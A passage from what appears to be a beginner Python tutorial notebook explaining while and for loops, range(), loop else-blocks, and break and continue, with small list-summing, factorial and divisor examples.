loop in Python ## 13.2.1 while loop Use while loop to iterate over a block of code as long as the test expression (also called test condition) is true. 
#### Syntax while test_expression: Body of while The body of the loop is entered only if the test_expression evaluates to True. After one iteration, the test expression is checked again. This process continues until the test_expression evaluates to False. #### Flowchart of <u>while</u> loop <img height="200" width="400" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/while_0.png?raw=true"></img> #### Examples of while loop ``` # Find the sum of all numbers in a list myList = [1, 2, 3, 4, 5] sum = 0 index = 0 while index < len(myList): sum += myList[index] # sum = sum + myList[index] index += 1 # index = index + 1 print('Sum of the array is: {}'.format(sum)) ``` #### Examples of while Loop with else statement While loop has an optional <b>else</b> block which one may use if one wishes to use it.<br/> The else block gets executed when the condition in while statement is <b>False</b>.<br/> The <b>else</b> can be skipped if we use a <b>break</b> command in the while block ``` myList = [1, 2, 3, 4, 5] #iterating over the list index = 0 while index < len(myList): print(myList[index]) break index += 1 else: print('Completed iterating the list') print('Eitherway printed') ``` #### Example: Calculate the factorial of a number ``` userInput = input("Enter a positive non-zero number: ") number = int(userInput) if number <= 0: print('Invalid number please re-enter') userInput = input("Enter a positive non-zero number: ") number = int(userInput) else: print('Thank you, let me share the result with you') fact = 1 if number > 0: while number > 0: fact *= number # fact = fact * number number -= 1 # number = number -1 print('The factorial of the number is: ', fact) ``` --- # 13.3 <u>for</u> Loop Python <b>for</b> loop in one of the most often used Python looping technque to iterate over a sequence (list, tuple, string) or other iterable objects. Iterating over a sequence is called traversal. 
#### Syntax: for element in sequence : 'for' code block Here, element is the variable that takes the value of the item inside the sequence on each iteration. Loop continues until we reach the last item in the sequence. #### Flowchart of <u>for</u> loop <img height="200" width="400" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/for_0.png?raw=true"></img> ``` # Sum of all numbers in a list myList = [1, 2, 3, 4, 5] sum = 0 #iterating over the list for element in myList: sum += element print("Sum of the aray is: {}".format(sum)) ``` #### range() function Often we need to run a for loop on a range of values that could be based on a starting point to an ending point with pre-specified step size. ##### range(start,stop,step size) The numbers in range are not stored but calculated dynamically on the fly using the 3 parameters start,stop, step size ``` # Print range of 5 for element in range(5): print(element) # Print range numbers from 0 to 40 but with step size of 12 for element in range(1,40,3): print(element) myList = [1, 2, 3, 4, "suchit"] # Iterate over myList using index #for index in range(len(myList)): # print(myList[index]) for element in myList: print(element) ``` #### for loop with else Similar to while loop, a for loop can have an optional else block. <br/> The else part is executed if the items in the sequence used in for loop exhausts. for loop's else part runs if no break occurs. ``` names = ['Suchit', 'Rakesh', 'Roshni'] #iterating over the list for name in names: print(name) else: print("Completed the names list") # Let us use the break keyword for name in names: print(name) if name == 'Rakesh': break else: print("Completed the names list") print('Totally outside the for else block') ``` #### Example: Program to calculate the divisors of number ``` inputNumber = input("Please enter a positive number: ") number = int(inputNumber) listOfDivisors = [1] for divisor in range(2,int(number/2)+1): # divisor -> 2.3.4.5.6.7.8....... 
int(num/2) + 1 if(number%divisor == 0): listOfDivisors.append(divisor) else: print(listOfDivisors) ``` --- # 13.4 <u>break & continue</u> in Python The break and continue statements can alter the flow of a normal loop. Loops iterate over a block of code until test expression is false, but sometimes we may need to terminate the current iteration or even the whole loop without cheking test expression. The break and continue statements are used in these cases. #### Python break Statement Syntax: break #### Python continue Statement syntax: continue #### Flowchart of <u>break and continue</u> loop <table width=100%> <tr><th align="center"><h2>break</h2></th><th align="center"><h2>continue</h2></th></tr> <tr><td><img height="260" width="300" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/break.jpg?raw=true"></img></td><td><img height="260" width="380" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/continue.jpg?raw=true"></img></td> </tr> </table> #### Examples of break and continue ``` # Use of break names = ['Suchit', 'Rakesh', 'Roshni'] for name in names: # Let us iterate over the names list if name == 'Rakesh': break print(name) else: print('For is completed and we are in else part') print("Totally outside the for & else loop") # Use of continue names = ['Suchit', 'Rakesh', 'Roshni'] for name in names: # Let us iterate over the names list if name == 'Rakesh': continue print(name) # If continue condition is satisfied we skip this line and carry on with the next iteration else: print('For is completed and we are in else part') print("Totally outside the for & else loop") ``` #### Example: First 3 divisors of a number except 2 & 3 ``` inputNumber = input("Please enter a positive number: ") number = int(inputNumber) listOfDivisors = [1] for divisor in range(2,int(number/2)+1): if number%divisor == 0: if divisor in [2,3]: continue elif len(listOfDivisors) == 3: break listOfDivisors.append(divisor) print(listOfDivisors) ```
github_jupyter